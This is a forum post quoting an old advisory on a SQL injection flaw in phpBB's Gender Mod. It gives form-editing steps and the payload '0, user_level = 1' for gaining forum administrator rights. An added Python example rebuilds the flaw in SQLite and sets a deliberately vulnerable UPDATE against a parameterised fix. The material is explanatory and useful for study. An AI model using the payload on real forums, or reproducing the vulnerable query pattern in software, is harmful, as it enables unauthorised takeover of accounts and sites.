I found this post recently...
A vulnerability was reported in the phpBB bulletin board software. When used with the 'Gender Mod' modification, a remote authenticated user can gain administrative privileges on the forum.
It is reported that Gender Mod contains an input validation flaw that allows remote authenticated users to inject SQL fields into the UPDATE SQL command. A remote user can assign the value 'user_level = 1' to gain administrator privileges on the bulletin board.
The following demonstration exploit steps are provided:
1. Save the User Profile page to your disk to modify it offline.
2. Add the correct full post action address (http://forum.victim.com/...):
<FORM action=http://forum.victim.com/profile.php?sid=<current_session_id> method=post encType=multipart/form-data>
3. Modify the HTML form so that the input field "gender" has a value like:
<input type=text name=gender value="0, user_level = 1 ">
4. Load this page in the same browser window where the cookie is still available.
Then, hit 'Submit' to change the user profile.
The vendor has reportedly been notified.
http://www.phpadvisory.com/advisories/view.phtml?ID=52
Edit: nevermind. I see that the latest version fixes this.
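To make the mechanism in the quoted advisory concrete, here is an added example (my own code, not phpBB's or the Gender Mod's) that reconstructs the flaw with an in-memory SQLite table. The table and column names (users, user_gender, user_level), the meaning of user_level = 1 as admin and 0 as normal user, and the accepted gender range are assumptions for the demonstration; only the payload string and the idea of an unvalidated value spliced into the SET clause of an UPDATE come from the advisory.

```python
import sqlite3

# Constructed sample data: a minimal phpBB-like users table.
# Assumption: user_level 1 = administrator, 0 = ordinary user.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT,"
        " user_gender INTEGER, user_level INTEGER)"
    )
    conn.execute("INSERT INTO users VALUES (2, 'admin', 0, 1)")
    conn.execute("INSERT INTO users VALUES (3, 'alice', 0, 0)")
    conn.commit()
    return conn


def update_gender_vulnerable(conn, user_id, gender):
    # Reconstruction of the flaw: the raw POST value for 'gender' is
    # concatenated straight into the SET clause, so extra "col = value"
    # pairs in the field become part of the UPDATE.
    sql = f"UPDATE users SET user_gender = {gender} WHERE user_id = {int(user_id)}"
    conn.execute(sql)
    conn.commit()
    return sql


def update_gender_fixed(conn, user_id, gender):
    # Hardened form: coerce to int, whitelist the range, and bind the value
    # as a parameter so it can never be interpreted as SQL.
    try:
        g = int(gender)
    except (TypeError, ValueError):
        raise ValueError("gender must be an integer")
    if g not in (0, 1, 2):  # assumed valid range: unspecified/male/female
        raise ValueError("gender out of range")
    conn.execute(
        "UPDATE users SET user_gender = ? WHERE user_id = ?", (g, int(user_id))
    )
    conn.commit()
    return g


def user_level(conn, user_id):
    row = conn.execute(
        "SELECT user_level FROM users WHERE user_id = ?", (user_id,)
    ).fetchone()
    return row[0]


def demo():
    payload = "0, user_level = 1 "  # the value from the advisory's form field

    # Vulnerable path: alice (user_id 3) submits the payload as her 'gender'.
    conn = make_db()
    level_before = user_level(conn, 3)
    update_gender_vulnerable(conn, 3, payload)
    level_after_vulnerable = user_level(conn, 3)

    # Fixed path: the same payload is rejected before any SQL is built.
    conn2 = make_db()
    try:
        update_gender_fixed(conn2, 3, payload)
        rejected = False
    except ValueError:
        rejected = True
    level_after_fixed = user_level(conn2, 3)

    return level_before, level_after_vulnerable, rejected, level_after_fixed


if __name__ == "__main__":
    print(demo())
```

Note that the payload contains no quote characters: it works even if the application escapes quotes (addslashes-style filtering), because the value is used in a numeric context and the injection is purely structural. Only validating the type and range of the field, or binding it as a parameter, closes the hole.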